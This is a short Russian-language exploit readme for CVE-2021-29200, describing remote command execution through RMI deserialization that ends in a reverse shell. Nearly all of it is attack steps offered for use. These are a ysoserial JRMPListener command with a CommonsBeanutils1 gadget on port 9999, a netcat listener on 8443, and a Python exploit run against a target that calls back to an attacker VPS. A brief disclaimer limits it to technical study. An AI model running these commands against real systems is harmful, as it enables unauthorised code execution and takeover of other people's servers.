
Эксплойт для CVE-2021-29200, обеспечивающий удаленное выполнение команд через атаку десериализации RMI с использованием слушателя JRMP и доставки полезной нагрузки обратной оболочки.
CVE-2021-29200 EXP может успешно получить обратную оболочку
Данная статья и инструмент предназначены только для технического ознакомления. Строго запрещено использование в незаконных целях. В противном случае вся ответственность ложится на вас.
RMI на порту 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[команда_для_выполнения]'
nc на порту 8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
